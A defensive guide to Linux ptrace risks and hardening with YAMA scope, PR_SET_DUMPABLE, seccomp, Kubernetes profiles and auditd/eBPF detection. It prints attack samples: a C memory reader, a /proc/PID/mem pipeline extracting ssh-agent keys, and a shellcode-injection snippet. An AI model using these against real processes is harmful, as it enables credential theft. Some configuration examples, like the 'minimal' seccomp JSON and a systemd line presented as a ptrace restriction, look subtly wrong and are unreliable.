Linux ptrace Security and YAMA LSM Hardening
The Problem
ptrace(2) is a debugging syscall. It is also one of the most dangerous primitives in the Linux kernel: any process that can attach to another can read and write its entire address space, forge its syscalls, and inject arbitrary code into it. The system call was designed in a world where “processes belonging to the same user” were equivalent in trust. That assumption has not held for decades.
On a modern system, the same UID runs a browser, an SSH agent, a credential manager, a cloud CLI, a secret vault daemon, and a dozen other processes — each holding different secrets. Default kernel policy (ptrace_scope=0) allows any of them to attach to any other. A single compromised process in that UID space can exfiltrate everything.
The attack surface is not theoretical:
- ssh-agent credential theft: An attacker with code execution in the user’s session can attach to ssh-agent, walk its memory, and extract private keys — without touching the filesystem.
- gpg-agent / pass: Same pattern. The decrypted secret lives in memory; ptrace reaches it.
- Browser credential stores: Chromium, Firefox, Electron-based apps keep session tokens and saved passwords in heap memory. Ptrace reads them.
- Cloud CLIs: AWS/GCP/Azure CLI processes cache short-lived credentials in memory. The process credential is often more valuable than the stored credential file.
- Container escapes: If a container shares a PID namespace with the host, an attacker inside the container can ptrace host processes if the scope is not restricted.
The mitigations — YAMA LSM, PR_SET_DUMPABLE, seccomp BPF, and eBPF-based auditd — each defend a different layer. None is sufficient alone.
ptrace as an Attack Primitive
The Core Capability
PTRACE_ATTACH stops a target process and grants the tracer full read/write access to the target’s:
- Virtual memory (
PTRACE_PEEKDATA,PTRACE_POKEDATA) - Registers (
PTRACE_GETREGS,PTRACE_SETREGS) - Signal delivery
- Syscall arguments and return values
A minimal credential extractor is fewer than 60 lines of C:
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char **argv) {
pid_t target = atoi(argv[1]);
long word;
if (ptrace(PTRACE_ATTACH, target, NULL, NULL) < 0) {
perror("ptrace attach");
return 1;
}
waitpid(target, NULL, 0);
/* Read 64 bytes from the target's stack pointer */
unsigned long sp;
struct user_regs_struct regs;
ptrace(PTRACE_GETREGS, target, NULL, ®s);
sp = regs.rsp;
for (int i = 0; i < 8; i++) {
word = ptrace(PTRACE_PEEKDATA, target, (void *)(sp + i * 8), NULL);
printf("%016lx ", word);
}
ptrace(PTRACE_DETACH, target, NULL, NULL);
return 0;
}
Real-world tools like mimipenguin, gcore, and proc_maps_reader use the same mechanism against known offsets in ssh-agent’s heap.
/proc/PID/mem: The Higher-Bandwidth Route
/proc/PID/mem provides a file interface to process address space. Reading it requires PTRACE_ATTACH permission (same access control as ptrace itself), but throughput is much higher — read(2) on /proc/PID/mem is faster than byte-at-a-time PTRACE_PEEKDATA.
The canonical attack:
# Attach, then read the entire heap in one call
pid=$(pgrep ssh-agent)
# Stop the target
kill -STOP $pid
# Read from /proc/PID/maps to find heap range
grep heap /proc/$pid/maps
# e.g.: 55a2b3c00000-55a2b3e00000 rw-p ...
# Read the heap directly
dd if=/proc/$pid/mem bs=1 skip=$((0x55a2b3c00000)) count=$((0x200000)) 2>/dev/null | \
strings | grep -E 'OPENSSH|ecdsa|rsa'
kill -CONT $pid
This works on a default ptrace_scope=0 system for any process owned by the same UID. The file descriptor check on /proc/PID/mem calls ptrace_may_access() in the kernel — the same function gated by YAMA.
Code Injection via ptrace
PTRACE_POKEDATA allows writing to the target’s memory. Combined with PTRACE_SETREGS to redirect the instruction pointer, this is full shellcode injection:
/* Write shellcode into target's .text segment and redirect RIP */
for (int i = 0; i < shellcode_len / 8; i++) {
ptrace(PTRACE_POKEDATA, target,
(void *)(target_addr + i * 8),
*(long *)(shellcode + i * 8));
}
regs.rip = target_addr;
ptrace(PTRACE_SETREGS, target, NULL, ®s);
ptrace(PTRACE_CONT, target, NULL, NULL);
This is the mechanism behind process hollowing, reflective library injection, and the dlinject family of tools.
YAMA LSM: Restricting ptrace Scope
YAMA is a Linux Security Module focused entirely on restricting ptrace. It ships in every major distribution and is controlled via a single sysctl: kernel.yama.ptrace_scope.
The Four Scope Levels
Scope 0 — Classic (no restriction)
Any process can ptrace any other process owned by the same UID. Root can ptrace anything. This is the historical Unix behavior and the default on many distributions.
sysctl kernel.yama.ptrace_scope
# kernel.yama.ptrace_scope = 0
Scope 1 — Restricted (parent-only)
A process can only be ptraced by:
- Its direct parent
- Processes it has explicitly designated via
PR_SET_PTRACER - Root (CAP_SYS_PTRACE)
This is the correct setting for most production systems. gdb ./program works because the shell (parent) spawns the target. strace -p <pid> of an unrelated process does not, unless root or PR_SET_PTRACER is used.
sysctl -w kernel.yama.ptrace_scope=1
Scope 2 — Admin-only
Only processes with CAP_SYS_PTRACE can use ptrace. No ordinary user can debug anything, regardless of ownership.
sysctl -w kernel.yama.ptrace_scope=2
Scope 3 — Fully disabled
ptrace is disabled system-wide. Not even root can use it without rebooting with a different scope. This value is sticky until reboot when set via sysctl at runtime.
sysctl -w kernel.yama.ptrace_scope=3
To make it persistent:
# /etc/sysctl.d/99-yama.conf
kernel.yama.ptrace_scope = 1
For high-security systems running no interactive debugging workloads:
# /etc/sysctl.d/99-yama.conf
kernel.yama.ptrace_scope = 2
Trade-offs by Environment
| Environment | Recommended scope | Rationale |
|---|---|---|
| Production servers (no debugger) | 2 | No interactive debugging; admin-only for emergency use |
| Kubernetes worker nodes | 1 | kubelet and container runtimes need parent-child ptrace |
| Developer workstations | 1 | gdb/strace work for parent-spawned targets |
| Security-critical hosts (HSMs, secret brokers) | 3 | No debugging, ever |
| CI/CD runners | 1 | Build tools that use strace/ltrace for reproducibility |
PR_SET_PTRACER: Opt-In Debugger Allowlisting
Under scope 1, a process can grant a specific other process permission to attach via prctl(PR_SET_PTRACER, pid, ...). This is the correct mechanism to allow, for example, a dedicated debug helper to attach to a service without running as root:
#include <sys/prctl.h>
/* Allow the process with PID 'debugger_pid' to attach to us */
prctl(PR_SET_PTRACER, debugger_pid, 0, 0, 0);
/* Allow any process to attach (USE WITH EXTREME CAUTION) */
prctl(PR_SET_PTRACER, PR_SET_PTRACER_ANY, 0, 0, 0);
In practice, PR_SET_PTRACER_ANY is used by test frameworks that spawn tracers. In production, pass the specific PID of the authorized debugger process and revoke it by setting PR_SET_PTRACER back to 0 after the debugging session.
PR_SET_DUMPABLE: Protecting Secrets from Core Dumps
Core dumps can expose the same information as ptrace. A crashed ssh-agent produces a core file containing all in-memory private keys. PR_SET_DUMPABLE controls both core dump behavior and — critically — ptrace access.
#include <sys/prctl.h>
/* Disable core dumps and ptrace attach for this process */
prctl(PR_SET_DUMPABLE, 0, 0, 0, 0);
When PR_SET_DUMPABLE is 0:
- The kernel will not write a core file on crash.
/proc/PID/mem,/proc/PID/maps, and/proc/PID/environbecome inaccessible to non-root.PTRACE_ATTACHis denied (viaptrace_may_access()) even from same-UID processes.
This is the correct setting for any process that holds key material, session tokens, or credentials. OpenSSH 8.2+ sets this by default. If you maintain a daemon that handles secrets:
/* Called at startup, before handling any secrets */
if (prctl(PR_SET_DUMPABLE, 0, 0, 0, 0) != 0) {
err(1, "prctl PR_SET_DUMPABLE");
}
Note the interaction with YAMA: PR_SET_DUMPABLE=0 is enforced independently of ptrace_scope. Even at scope 0, a process that set itself non-dumpable cannot be attached to by a same-UID peer — only by root.
Interaction with setuid/setgid: The kernel automatically sets dumpable=0 when a process executes a setuid or setgid binary. This is why /proc/self/mem access restrictions tighten for setuid processes even without explicit prctl calls.
Seccomp and ptrace: Blocking the Syscall Entirely
For processes that will never issue ptrace (the vast majority of production workloads), seccomp BPF provides the hardest restriction: remove the syscall from the process’s callable surface entirely.
A minimal seccomp filter that blocks ptrace:
#include <linux/seccomp.h>
#include <linux/filter.h>
#include <linux/audit.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
static void block_ptrace(void) {
struct sock_filter filter[] = {
/* Load syscall number */
BPF_STMT(BPF_LD | BPF_W | BPF_ABS,
offsetof(struct seccomp_data, nr)),
/* Kill process if syscall is ptrace */
BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_ptrace, 0, 1),
BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL_PROCESS),
BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
};
struct sock_fprog prog = {
.len = sizeof(filter) / sizeof(filter[0]),
.filter = filter,
};
prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0);
syscall(SYS_seccomp, SECCOMP_SET_MODE_FILTER, 0, &prog);
}
Use SECCOMP_RET_ERRNO with EPERM instead of SECCOMP_RET_KILL_PROCESS if the process must not crash on an unexpected ptrace call (e.g., some JVM runtimes probe for ptrace availability at startup).
Container and Kubernetes Defaults
Docker/containerd default seccomp profile: Docker’s default seccomp profile (as of 2024) does NOT block ptrace. The ptrace syscall is allowed by default. This is intentional — Go runtime, Java debuggers, and strace-based diagnostics use it — but it means containers are not protected unless you supply a custom profile.
Check your container’s effective profile:
# Show the effective seccomp profile for a running container
docker inspect <container> --format '{{.HostConfig.SecurityOpt}}'
To apply a restrictive profile that blocks ptrace in Docker:
docker run --security-opt seccomp=/path/to/no-ptrace-seccomp.json ...
A minimal no-ptrace-seccomp.json (based on the Docker default with ptrace removed):
{
"defaultAction": "SCMP_ACT_ERRNO",
"syscalls": [
{
"names": ["ptrace"],
"action": "SCMP_ACT_ERRNO",
"errnoRet": 1
}
]
}
In practice, start from Docker’s default profile and remove ptrace from the allowlist rather than building from scratch.
Kubernetes seccomp annotations:
apiVersion: v1
kind: Pod
metadata:
name: hardened-app
spec:
securityContext:
seccompProfile:
type: Localhost
localhostProfile: profiles/no-ptrace.json
containers:
- name: app
image: myapp:latest
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
The RuntimeDefault seccomp profile (equivalent to Docker’s default) does not block ptrace. Use Localhost with a custom profile if you need that guarantee.
PID namespace isolation: In Kubernetes, the default is for each Pod to have its own PID namespace. With shareProcessNamespace: true, containers in a Pod share a PID namespace — and ptrace restrictions between those containers now depend on YAMA scope and UID alignment, not namespace isolation. Avoid shareProcessNamespace: true unless the use case requires it.
Linux 5.14+ Syscall User Dispatch
Linux 5.14 introduced Syscall User Dispatch (SUD), a mechanism that lets a process redirect specific syscall ranges to a userspace signal handler rather than the kernel. This is used by compatibility layers (Wine, Steam Proton) to intercept Windows syscalls.
The security interaction with ptrace: SUD handlers run in userspace and can inspect syscall arguments before they reach the kernel. A malicious library linked into a process could install a SUD handler that intercepts read(2) calls on /proc/PID/mem paths and logs or exfiltrates the data. The defense is the same as for other injection vectors — integrity of the process’s own address space.
From a defensive perspective, SUD’s relevance is that it does not bypass YAMA or seccomp: a process still needs PTRACE_ATTACH permission to open /proc/PID/mem, and seccomp still gates the ptrace syscall before dispatch reaches the kernel. SUD runs after seccomp in the syscall path. However, SUD can be used by a compromised process to intercept syscalls being made by its own threads, which is a lateral movement vector within a multi-threaded process if the attacker has written code into one thread via ptrace.
Detecting ptrace Attacks with auditd and eBPF
auditd: Syscall-Level Auditing
Audit rules to detect ptrace attach attempts:
# /etc/audit/rules.d/99-ptrace.rules
# Alert on all ptrace PTRACE_ATTACH and PTRACE_TRACEME calls
-a always,exit -F arch=b64 -S ptrace -F a0=0x10 -k ptrace_attach
-a always,exit -F arch=b64 -S ptrace -F a0=0x0 -k ptrace_traceme
-a always,exit -F arch=b32 -S ptrace -F a0=0x10 -k ptrace_attach
-a always,exit -F arch=b32 -S ptrace -F a0=0x0 -k ptrace_traceme
# Watch for /proc/*/mem opens
-a always,exit -F arch=b64 -S openat -F path=/proc -k proc_mem_open
Where a0=0x10 is PTRACE_ATTACH (decimal 16) and a0=0x0 is PTRACE_TRACEME. Load the rules:
augenrules --load
systemctl restart auditd
Query ptrace events:
ausearch -k ptrace_attach --start today | aureport -i
A spike in ptrace_attach events against a specific PID (e.g., ssh-agent, gnome-keyring-daemon, gpg-agent) is a strong indicator of credential theft activity.
eBPF: Per-Process Attach Monitoring
For production systems where auditd overhead is a concern, an eBPF kprobe on security_ptrace_check fires at the YAMA decision point:
// SPDX-License-Identifier: GPL-2.0
#include "vmlinux.h"
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_tracing.h>
struct event {
u32 tracer_pid;
u32 target_pid;
u32 tracer_uid;
char tracer_comm[16];
char target_comm[16];
};
struct { __uint(type, BPF_MAP_TYPE_RINGBUF); __uint(max_entries, 1 << 20); } events SEC(".maps");
SEC("lsm/ptrace_access_check")
int BPF_PROG(ptrace_access_check, struct task_struct *child, unsigned int mode) {
struct event *e = bpf_ringbuf_reserve(&events, sizeof(*e), 0);
if (!e) return 0;
e->tracer_pid = bpf_get_current_pid_tgid() >> 32;
e->target_pid = child->tgid;
e->tracer_uid = bpf_get_current_uid_gid() & 0xffffffff;
bpf_get_current_comm(e->tracer_comm, sizeof(e->tracer_comm));
bpf_probe_read_kernel_str(e->target_comm, sizeof(e->target_comm), child->comm);
bpf_ringbuf_submit(e, 0);
return 0; /* observe only, return 0 to continue */
}
char LICENSE[] SEC("license") = "GPL";
This attaches to the ptrace_access_check LSM hook — the same hook YAMA uses — so it fires on every ptrace permission check regardless of whether YAMA allows or denies. Return a non-zero value from the BPF program to deny the attach (combining eBPF LSM enforcement with observability).
Integrate with Falco or a custom alerting pipeline by reading from the ring buffer and emitting to your SIEM.
Hardening Checklist
Kernel sysctl (apply in /etc/sysctl.d/99-yama.conf):
# Restrict ptrace to parent-child relationships only
kernel.yama.ptrace_scope = 1
# On high-security nodes with no debugging requirement
kernel.yama.ptrace_scope = 2
Verify the setting survived boot:
sysctl kernel.yama.ptrace_scope
cat /proc/sys/kernel/yama/ptrace_scope
For daemons handling credentials — in service code:
/* Early in main(), before any key material is loaded */
prctl(PR_SET_DUMPABLE, 0, 0, 0, 0);
Or via systemd unit:
[Service]
# Equivalent to PR_SET_DUMPABLE=0
LimitCORE=0
# Additional ptrace restriction (requires systemd 247+)
RestrictAddressFamilies=AF_UNIX AF_INET AF_INET6
Note: LimitCORE=0 prevents core dumps but does not set PR_SET_DUMPABLE — ptrace restriction requires the prctl call or NoNewPrivileges=yes combined with YAMA scope ≥ 1.
For containers:
# Explicitly deny ptrace in container seccomp profile
# Do not rely on Docker default — it allows ptrace
docker run \
--security-opt no-new-privileges \
--security-opt seccomp=./no-ptrace.json \
myimage:latest
For Kubernetes:
spec:
securityContext:
seccompProfile:
type: Localhost
localhostProfile: no-ptrace.json
containers:
- securityContext:
allowPrivilegeEscalation: false
capabilities:
drop: ["ALL"]
For audit:
# Install ptrace audit rules
augenrules --load
# Verify YAMA is loaded and active
grep -r yama /sys/kernel/security/
ls /sys/module/yama/
What YAMA Does Not Protect
- Root bypass:
CAP_SYS_PTRACEbypasses YAMA entirely at all scope levels below 3. Any process with this capability can ptrace anything. AuditCAP_SYS_PTRACEgrants aggressively; it should never appear in production container security contexts. - Same process: Scope has no meaning within a process. A compromised thread can read the stack of other threads directly via shared memory. Compartmentalize secrets across processes, not threads.
- Kernel exploits: Kernel vulnerabilities bypass all LSMs. YAMA is a userspace-facing protection. Defense-in-depth via kernel lockdown mode, signed modules, and live patching is required at the layer below.
- Ambient authority: If the attacker already has root or is the parent process, scope 1 provides no protection. Scope 2 is the minimum for protecting against root-equivalent-but-not-root scenarios.
- Process injection via non-ptrace paths:
/proc/PID/fd, shared memory segments, and UNIX socket credential passing are separate attack surfaces not covered by YAMA.PR_SET_DUMPABLE=0protects/proc/PID/memand/proc/PID/mapsindependently of YAMA scope.
Summary
The default ptrace behavior on Linux grants full memory read/write access between processes of the same UID. In any multi-process environment — desktop sessions, Kubernetes pods sharing a PID namespace, containers — this is an unacceptable trust boundary.
The layered defense:
- YAMA
ptrace_scope=1on every production system.ptrace_scope=2on systems with no debugging requirement. PR_SET_DUMPABLE=0in every daemon that handles key material or credentials.- Seccomp BPF blocking
ptracein containers and sandboxed processes that have no debugging requirement. - Custom Kubernetes seccomp profiles — do not assume
RuntimeDefaultblocks ptrace. - auditd or eBPF LSM hooks to detect and alert on ptrace attach attempts against sensitive processes.
- Audit
CAP_SYS_PTRACEgrants — any process holding this capability renders YAMA scope ineffective.
ptrace is not a deprecated syscall. It remains the primary mechanism for debuggers, profilers, strace, and a significant fraction of security tooling. The goal is not to remove it but to restrict it to authorized parent-child relationships and to ensure that processes holding secrets have explicitly withdrawn their consent to being inspected.